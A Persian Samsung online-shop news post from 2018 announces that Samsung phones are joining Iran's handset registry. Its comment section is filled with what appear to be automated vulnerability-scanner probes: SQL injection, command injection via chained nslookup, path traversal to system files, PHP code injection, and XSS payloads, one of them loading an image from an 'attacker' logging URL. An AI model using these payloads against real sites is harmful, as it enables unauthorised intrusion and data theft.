بستن
جستجو
Filters

فروشگاه اینترنتی سامسونگ 724. برند سامسونگ مشمول طرح رجیستری تلفن همراه شد!

برند سامسونگ مشمول طرح رجیستری تلفن همراه شد!

سه شنبه, 17 آوريل 2018

قبل از این مدل‌های S9 و +S9 از سامسونگ مشمول طرح رجیستری شده بودند.

 

 برند سامسونگ ابتدای روز شنبه (ساعت 00:00 بامداد) مورخ 1 اردیبهشت 97 مشمول طرح رجیستری خواهد شد.

 

درصورتیکه دارای تلفن همراه با نشان تجاری سامسونگ می‌باشید و تلفن همراه شما به هردلیلی در چند ماه گذشته خاموش بوده است، لازم است تا قبل از زمان آغاز طرح، تلفن همراه خود را با قراردادن سیمکارت درون آن روشن کرده و حتی المقدور با آن تماس بگیرید و یا پیامکی ارسال کنید.

 

همچنین در صورتیکه تلفن همراه دارای دو یا چند سیمکارت می‌باشد، بایستی با قرار دادن سیمکارت درون همه شکاف‌ها (Slot)، نسبت به فعالسازی تلفن همراه خود اقدام نمایید.

لطفا نظر دهید
نظرات
20/11/2018 01:56 ب.ظ
Mr.

1

20/11/2018 03:00 ب.ظ
Mr.

response.write(9520794*9088663)

20/11/2018 03:00 ب.ظ
Mr.

'+response.write(9520794*9088663)+'

20/11/2018 03:00 ب.ظ
Mr.

"+response.write(9520794*9088663)+"

20/11/2018 03:00 ب.ظ
response.write(9665316*9417590)

1

20/11/2018 03:00 ب.ظ
Mr.

1

20/11/2018 03:00 ب.ظ
'+response.write(9665316*9417590)+'

1

20/11/2018 03:00 ب.ظ
"+response.write(9665316*9417590)+"

1

20/11/2018 03:00 ب.ظ
Mr.

1

20/11/2018 03:00 ب.ظ
Mr.

XGN0EVqk

20/11/2018 03:00 ب.ظ
Mr.

nslookup xjGjeDDg|nslookup xjGjeDDg&nslookup xjGjeDDg

20/11/2018 03:00 ب.ظ
Mr.

-1 OR 2+191-191-1=0+0+0+1 --

20/11/2018 03:00 ب.ظ
Mr.

'nslookup sVck4LH7|nslookup sVck4LH7&nslookup sVck4LH7'

20/11/2018 03:00 ب.ظ
Mr.

-1 OR 2+517-517-1=0+0+0+1

20/11/2018 03:00 ب.ظ
Mr.

"nslookup LjVypw7t|nslookup LjVypw7t&nslookup LjVypw7t"

20/11/2018 03:00 ب.ظ
Mr.

-1' OR 2+969-969-1=0+0+0+1 --

20/11/2018 03:00 ب.ظ
Mr.


nslookup nFZEbmDm|nslookup nFZEbmDm&nslookup nFZEbmDm

20/11/2018 03:00 ب.ظ
Mr.

-1' OR 2+104-104-1=0+0+0+1 or 'xIhHQ99R'='

20/11/2018 03:00 ب.ظ
Mr.

MZGE4SzZ

20/11/2018 03:00 ب.ظ
Mr.

`nslookup xgYqDkIk|nslookup xgYqDkIk&nslookup xgYqDkIk`

20/11/2018 03:00 ب.ظ
5r8OJ8qf

1

20/11/2018 03:00 ب.ظ
Mr.

-1" OR 2+480-480-1=0+0+0+1 --

20/11/2018 03:00 ب.ظ
Mr.

print `nslookup 1cMkVnfu`

20/11/2018 03:00 ب.ظ
Mr.

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

20/11/2018 03:00 ب.ظ
Mr.

;nslookup Uot00hAB|nslookup Uot00hAB&nslookup Uot00hAB;

20/11/2018 03:00 ب.ظ
Mr.

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

20/11/2018 03:00 ب.ظ
nslookup IF15BpKs|nslookup IF15BpKs&nslookup IF15BpKs

1

20/11/2018 03:00 ب.ظ
Mr.

-1; waitfor delay '0:0:3' --

20/11/2018 03:00 ب.ظ
'nslookup mBExWbwj|nslookup mBExWbwj&nslookup mBExWbwj'

1

20/11/2018 03:00 ب.ظ
Mr.

-1); waitfor delay '0:0:3' --

20/11/2018 03:00 ب.ظ
Mr.

-1)); waitfor delay '0:0:3' --

20/11/2018 03:00 ب.ظ
Mr.

1 waitfor delay '0:0:3' --

20/11/2018 03:00 ب.ظ
Mr.

XX1LaHyQ'; waitfor delay '0:0:7' --

20/11/2018 03:00 ب.ظ
Mr.

5X1DPOC0'); waitfor delay '0:0:7' --

20/11/2018 03:00 ب.ظ
"nslookup s2LhOQFL|nslookup s2LhOQFL&nslookup s2LhOQFL"

1

20/11/2018 03:00 ب.ظ
Mr.

GS2eOkkf')); waitfor delay '0:0:7' --

20/11/2018 03:00 ب.ظ
Mr.

-1;select pg_sleep(7); --

20/11/2018 03:00 ب.ظ
Mr.

-1);select pg_sleep(7); --

20/11/2018 03:00 ب.ظ
Mr.

12345'"\'\");|]*{
<>�''💩

20/11/2018 03:00 ب.ظ
Mr.

-1));select pg_sleep(7); --

20/11/2018 03:00 ب.ظ
Mr.

../../../../../../../../../../windows/win.ini

20/11/2018 03:00 ب.ظ
Mr.

5BmelQWF';select pg_sleep(10); --

20/11/2018 03:00 ب.ظ
Mr.

edBQwkdw');select pg_sleep(10); --

20/11/2018 03:00 ب.ظ
Mr.

../../../../../../../../../../boot.ini

20/11/2018 03:00 ب.ظ
Mr.

pUEkMIlS'));select pg_sleep(10); --

20/11/2018 03:00 ب.ظ
Mr.

1

20/11/2018 03:00 ب.ظ
Mr.

1

20/11/2018 03:00 ب.ظ
Mr.

../../../../../../../../../../windows/win.ini.jpg

20/11/2018 03:00 ب.ظ
Mr.

������������������������������������������������windows��win.ini

20/11/2018 03:00 ب.ظ
nslookup PEb08HZg|nslookup PEb08HZg&nslookup PEb08HZg

1

20/11/2018 03:00 ب.ظ
Mr.

................windowswin.ini

20/11/2018 03:00 ب.ظ
Mr.

1

20/11/2018 03:00 ب.ظ
Mr.

${10000304+9999618}

20/11/2018 03:00 ب.ظ
BPa0WRL8

1

20/11/2018 03:00 ب.ظ
${9999002+9999430}

1

20/11/2018 03:00 ب.ظ
-1 OR 2+945-945-1=0+0+0+1 --

1

20/11/2018 03:00 ب.ظ
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

20/11/2018 03:00 ب.ظ
-1 OR 2+788-788-1=0+0+0+1

1

20/11/2018 03:00 ب.ظ
Mr.

..\..\..\..\..\..\..\..\windows\win.ini

20/11/2018 03:00 ب.ظ
Mr.

1some_inexistent_file_with_long_name.jpg

20/11/2018 03:00 ب.ظ
-1' OR 2+115-115-1=0+0+0+1 --

1

20/11/2018 03:00 ب.ظ
Mr.

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

20/11/2018 03:00 ب.ظ
-1' OR 2+629-629-1=0+0+0+1 or 'lvYwMm7C'='

1

20/11/2018 03:00 ب.ظ
`nslookup tKcAo0Sw|nslookup tKcAo0Sw&nslookup tKcAo0Sw`

1

20/11/2018 03:00 ب.ظ
-1" OR 2+899-899-1=0+0+0+1 --

1

20/11/2018 03:00 ب.ظ
print `nslookup 5YNmwKk7`

1

20/11/2018 03:00 ب.ظ
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

20/11/2018 03:00 ب.ظ
Mr.

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

20/11/2018 03:00 ب.ظ
Mr.

Http://testasp.vulnweb.com/t/fit.txt

20/11/2018 03:00 ب.ظ
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

20/11/2018 03:00 ب.ظ
;nslookup PlZTYkzy|nslookup PlZTYkzy&nslookup PlZTYkzy;

1

20/11/2018 03:00 ب.ظ
Mr.

1&n957322=v967082

20/11/2018 03:00 ب.ظ
Mr.

http://testasp.vulnweb.com/t/fit.txt?.jpg

20/11/2018 03:00 ب.ظ
Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

20/11/2018 03:00 ب.ظ
12345'"\'\");|]*{ <>�''💩

1

20/11/2018 03:00 ب.ظ
Mr.

1

20/11/2018 03:00 ب.ظ
1 waitfor delay '0:0:3' --

1

20/11/2018 03:00 ب.ظ
Mr.&n974062=v981471

1

20/11/2018 03:00 ب.ظ
Mr.

testasp.vulnweb.com

20/11/2018 03:00 ب.ظ
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.

1

20/11/2018 03:00 ب.ظ
1 waitfor delay '0:0:6' --

1

20/11/2018 03:00 ب.ظ
Mr.

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

20/11/2018 03:00 ب.ظ
Mr.

WEB-INF/web.xml?

20/11/2018 03:00 ب.ظ
Mr.

WEB-INF\web.xml?

20/11/2018 03:00 ب.ظ
Mr.

'"()

20/11/2018 03:00 ب.ظ
Mr.

/WEB-INF/web.xml?

20/11/2018 03:00 ب.ظ
1some_inexistent_file_with_long_name.

1

20/11/2018 03:00 ب.ظ
vX8m1L5T'; waitfor delay '0:0:3' --

1

20/11/2018 03:00 ب.ظ
../../../../../../../../../../windows/win.ini

1

20/11/2018 03:00 ب.ظ
Http://testasp.vulnweb.com/t/fit.txt

1

20/11/2018 03:00 ب.ظ
JVWt74dp'); waitfor delay '0:0:3' --

1

20/11/2018 03:00 ب.ظ
../../../../../../../../../../boot.ini

1

20/11/2018 03:00 ب.ظ
'"()

1

20/11/2018 03:00 ب.ظ
Mr.

;print(md5(acunetix_wvs_security_test));

20/11/2018 03:00 ب.ظ
http://testasp.vulnweb.com/t/fit.txt?.

1

20/11/2018 03:00 ب.ظ
Mr.

';print(md5(acunetix_wvs_security_test));$a='

20/11/2018 03:00 ب.ظ
../../../../../../../../../../windows/win.ini.

1

20/11/2018 03:00 ب.ظ
testasp.vulnweb.com

1

20/11/2018 03:00 ب.ظ
4ujEOhtS')); waitfor delay '0:0:6' --

1

20/11/2018 03:00 ب.ظ
Mr.

http://testasp.vulnweb.com/t/xss.html?%00.jpg

20/11/2018 03:00 ب.ظ
http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

20/11/2018 03:00 ب.ظ
Mr.

)

20/11/2018 03:00 ب.ظ
tcmlGAHt';select pg_sleep(6); --

1

20/11/2018 03:00 ب.ظ
Mr.

%d8%a8%d8%b1%d9%86%d8%af-%d8%b3%d8%a7%d9%85%d8%b3%d9%88%d9%86%da%af-%d9%85%d8%b4%d9%85%d9%88%d9%84-%d8%b7%d8%b1%d8%ad-%d8%b1%d8%ac%db%8c%d8%b3%d8%aa%d8%b1%db%8c-%d8%aa%d9%84%d9%81%d9%86-%d9%87%d9%85%d8%b1%d8%a7%d9%87-%d8%b4%d8%af

20/11/2018 03:00 ب.ظ
Mr.

!(()&&!|*|*|

20/11/2018 03:01 ب.ظ
g1mnxVCG');select pg_sleep(6); --

1

20/11/2018 03:01 ب.ظ
Mr.

%d8%a8%d8%b1%d9%86%d8%af-%d8%b3%d8%a7%d9%85%d8%b3%d9%88%d9%86%da%af-%d9%85%d8%b4%d9%85%d9%88%d9%84-%d8%b7%d8%b1%d8%ad-%d8%b1%d8%ac%db%8c%d8%b3%d8%aa%d8%b1%db%8c-%d8%aa%d9%84%d9%81%d9%86-%d9%87%d9%85%d8%b1%d8%a7%d9%87-%d8%b4%d8%af

20/11/2018 03:01 ب.ظ
Bj4IizhL'));select pg_sleep(6); --

1

20/11/2018 03:01 ب.ظ
Mr.

%d8%a8%d8%b1%d9%86%d8%af-%d8%b3%d8%a7%d9%85%d8%b3%d9%88%d9%86%da%af-%d9%85%d8%b4%d9%85%d9%88%d9%84-%d8%b7%d8%b1%d8%ad-%d8%b1%d8%ac%db%8c%d8%b3%d8%aa%d8%b1%db%8c-%d8%aa%d9%84%d9%81%d9%86-%d9%87%d9%85%d8%b1%d8%a7%d9%87-%d8%b4%d8%af/.

20/11/2018 03:01 ب.ظ
Mr.

http://hitho3zpbPcep.bxss.me/

20/11/2018 03:01 ب.ظ
������������������������������������������������windows��win.ini

1

20/11/2018 03:01 ب.ظ
http://hituGugMAYIij.bxss.me/

1

20/11/2018 03:01 ب.ظ
Mr.

^(#$!@#$)(()))******

20/11/2018 03:01 ب.ظ
)

1

20/11/2018 03:01 ب.ظ
Mr.

";print(md5(acunetix_wvs_security_test));$a="

20/11/2018 03:01 ب.ظ
!(()&&!|*|*|

1

20/11/2018 03:01 ب.ظ
Mr.

${@print(md5(acunetix_wvs_security_test))}

20/11/2018 03:01 ب.ظ
Mr.

${@print(md5(acunetix_wvs_security_test))}\

20/11/2018 03:01 ب.ظ
Mr.

1'"

20/11/2018 03:01 ب.ظ
^(#$!@#$)(()))******

1

20/11/2018 03:01 ب.ظ
................windowswin.ini

1

20/11/2018 03:01 ب.ظ
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

20/11/2018 03:01 ب.ظ
;print(md5(acunetix_wvs_security_test));

1

20/11/2018 03:01 ب.ظ
..\..\..\..\..\..\..\..\windows\win.ini

1

20/11/2018 03:01 ب.ظ
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

20/11/2018 03:01 ب.ظ
';print(md5(acunetix_wvs_security_test));$a='

1

20/11/2018 03:01 ب.ظ
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

20/11/2018 03:01 ب.ظ
Mr.

\

20/11/2018 03:01 ب.ظ
";print(md5(acunetix_wvs_security_test));$a="

1

20/11/2018 03:01 ب.ظ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

20/11/2018 03:01 ب.ظ
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

20/11/2018 03:01 ب.ظ
Mr.

1����

20/11/2018 03:01 ب.ظ
Mr.

/www.vulnweb.com

20/11/2018 03:01 ب.ظ
${@print(md5(acunetix_wvs_security_test))}

1

20/11/2018 03:01 ب.ظ
/www.vulnweb.com

1

20/11/2018 03:01 ب.ظ
Mr.

@@t5ruW

20/11/2018 03:01 ب.ظ
${@print(md5(acunetix_wvs_security_test))}\

1

20/11/2018 03:01 ب.ظ
Mr.

'"

20/11/2018 03:01 ب.ظ
Mr.

1'"()&%<acx><ScRiPt >prompt(938543)</ScRiPt>

20/11/2018 03:01 ب.ظ
Mr.

<!--

20/11/2018 03:01 ب.ظ
Mr.

JyI=

20/11/2018 03:01 ب.ظ
Mr.

�'�"

20/11/2018 03:01 ب.ظ
Mr.

'"()&%<acx><ScRiPt >prompt(985569)</ScRiPt>

20/11/2018 03:01 ب.ظ
Mr.

�''�""

20/11/2018 03:01 ب.ظ
Mr.

1_901447

20/11/2018 03:01 ب.ظ
WEB-INF/web.xml?

1

20/11/2018 03:01 ب.ظ
'"

1

20/11/2018 03:01 ب.ظ
WEB-INF\web.xml?

1

20/11/2018 03:01 ب.ظ
Mr.

(select convert(int,CHAR(65)))

20/11/2018 03:01 ب.ظ
Mr.

acu9612<s1﹥s2ʺs3ʹuca9612

20/11/2018 03:01 ب.ظ
<!--

1

20/11/2018 03:01 ب.ظ
1'"

1

20/11/2018 03:01 ب.ظ
\

1

20/11/2018 03:01 ب.ظ
/WEB-INF/web.xml?

1

20/11/2018 03:01 ب.ظ
1����

1

20/11/2018 03:01 ب.ظ
@@PqKE6

1

20/11/2018 03:01 ب.ظ
Mr.

acux4989��z1��z2a�bcxuca4989

20/11/2018 03:01 ب.ظ
JyI=

1

20/11/2018 03:01 ب.ظ
�'�"

1

20/11/2018 03:01 ب.ظ
�''�""

1

20/11/2018 03:01 ب.ظ
(select convert(int,CHAR(65)))

1

20/11/2018 03:01 ب.ظ
Mr.

acurRPFN𝌆ucarRPFN

20/11/2018 03:01 ب.ظ
Mr.

CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0  

20/11/2018 03:01 ب.ظ
Mr.

1<ScRiPt >prompt(993957)</ScRiPt>

20/11/2018 03:01 ب.ظ
Mr.

1<script>prompt(997754)</script>

20/11/2018 03:01 ب.ظ
Mr.

1<ScR<ScRiPt>IpT>prompt(908688)</sCr<ScRiPt>IpT>

20/11/2018 03:02 ب.ظ
Mr.

1<ScRiPt
>prompt(969820)</ScRiPt>

20/11/2018 03:02 ب.ظ
Mr.

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910944></ScRiPt>

20/11/2018 03:02 ب.ظ
Mr.

1<ScRiPt
>prompt(914130)</ScRiPt>

20/11/2018 03:02 ب.ظ
Mr.

1<video><source onerror="javascript:prompt(904401)">

20/11/2018 03:02 ب.ظ
Mr.

1<svg  

�onload=prompt(938450);>

20/11/2018 03:02 ب.ظ
Mr.

1%3Csvg%20onload%3Dprompt(969585)%3E

20/11/2018 03:02 ب.ظ
Mr.

1<isindex type=image src=1 onerror=prompt(928972)>

20/11/2018 03:02 ب.ظ
Mr.

1<div style=width:expression(prompt(946168))>

20/11/2018 03:02 ب.ظ
Mr.

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='933612'>

20/11/2018 03:03 ب.ظ
Mr.

1<body onload=prompt(969704)>

20/11/2018 03:03 ب.ظ
Mr.

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(907162)>

20/11/2018 03:03 ب.ظ
Mr.

1<img src=xyz OnErRor=prompt(937407)>

20/11/2018 03:03 ب.ظ
Mr.

1<img/src=">" onerror=alert(909489)>

20/11/2018 03:03 ب.ظ
Mr.

1<ScRiPt%20>prompt(964946)</sCripT>

20/11/2018 03:03 ب.ظ
Mr.

1\u003CScRiPt\u003Eprompt(993272)\u003C/sCripT\u003E

20/11/2018 03:03 ب.ظ
Mr.

1&lt;ScRiPt&gt;prompt(901465)&lt;/sCripT&gt;

20/11/2018 03:03 ب.ظ
Mr.

�<img acu onmouseover=prompt(973098) //�>

20/11/2018 03:03 ب.ظ
Mr.

1<input autofocus onfocus=prompt(919511)>

20/11/2018 03:03 ب.ظ
Mr.

<a HrEF=http://www.vulnweb.com></a>

20/11/2018 03:04 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

20/11/2018 03:04 ب.ظ
Mr.

[url=http://www.vulnweb.com][/url]

20/11/2018 03:04 ب.ظ
Mr.

1<img<!-- --> src=x onerror=alert(961974);//><!-- -->

20/11/2018 03:04 ب.ظ
Mr.

1}body{acu:Expre/**/SSion(prompt(983718))}

20/11/2018 03:04 ب.ظ
Mr.

1_BD73U
<ScRiPt >prompt(979914)</ScRiPt>

20/11/2018 03:04 ب.ظ
Mr.

1<ifRAme sRc=921408.com></IfRamE>

20/11/2018 03:04 ب.ظ
Mr.

1<img sRc='http://attacker-989439/log.php?

20/11/2018 03:04 ب.ظ
Mr.'"()&%<acx><ScRiPt >prompt(978442)</ScRiPt>

1

20/11/2018 03:04 ب.ظ
'"()&%<acx><ScRiPt >prompt(904056)</ScRiPt>

1

20/11/2018 03:04 ب.ظ
Mr._925298

1

20/11/2018 03:04 ب.ظ
acu10730<s1﹥s2ʺs3ʹuca10730

1

20/11/2018 03:04 ب.ظ
acux8560��z1��z2a�bcxuca8560

1

20/11/2018 03:05 ب.ظ
acub3gsB𝌆ucab3gsB

1

20/11/2018 03:05 ب.ظ
Mr.<ScRiPt >prompt(913964)</ScRiPt>

1

20/11/2018 03:05 ب.ظ
Mr.<script>prompt(993773)</script>

1

20/11/2018 03:05 ب.ظ
Mr.<ScR<ScRiPt>IpT>prompt(931973)</sCr<ScRiPt>IpT>

1

20/11/2018 03:05 ب.ظ
Mr.<ScRiPt >prompt(954036)</ScRiPt>

1

20/11/2018 03:05 ب.ظ
Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?944645></ScRiPt>

1

20/11/2018 03:05 ب.ظ
Mr.<ScRiPt >prompt(926492)</ScRiPt>

1

20/11/2018 03:05 ب.ظ
Mr.<video><source onerror="javascript:prompt(950064)">

1

20/11/2018 03:05 ب.ظ
Mr.<svg �onload=prompt(982864);>

1

20/11/2018 03:05 ب.ظ
Mr.%3Csvg%20onload%3Dprompt(904774)%3E

1

20/11/2018 03:05 ب.ظ
Mr.<isindex type=image src=1 onerror=prompt(993606)>

1

20/11/2018 03:05 ب.ظ
Mr.<div style=width:expression(prompt(905711))>

1

20/11/2018 03:06 ب.ظ
Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='908183'>

1

20/11/2018 03:06 ب.ظ
Mr.<body onload=prompt(927367)>

1

20/11/2018 03:06 ب.ظ
Mr.<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997297)>

1

20/11/2018 03:06 ب.ظ
Mr.<img src=xyz OnErRor=prompt(999057)>

1

20/11/2018 03:06 ب.ظ
Mr.<img/src=">" onerror=alert(951767)>

1

20/11/2018 03:06 ب.ظ
Mr.<ScRiPt%20>prompt(981191)</sCripT>

1

20/11/2018 03:06 ب.ظ
Mr.\u003CScRiPt\u003Eprompt(965156)\u003C/sCripT\u003E

1

20/11/2018 03:06 ب.ظ
Mr.&lt;ScRiPt&gt;prompt(934297)&lt;/sCripT&gt;

1

20/11/2018 03:06 ب.ظ
�<img acu onmouseover=prompt(976319) //�>

1

20/11/2018 03:07 ب.ظ
Mr.<input autofocus onfocus=prompt(929807)>

1

20/11/2018 03:07 ب.ظ
<a HrEF=http://www.vulnweb.com></a>

1

20/11/2018 03:07 ب.ظ
<a HrEF=jaVaScRiPT:>

1

20/11/2018 03:07 ب.ظ
[url=http://www.vulnweb.com][/url]

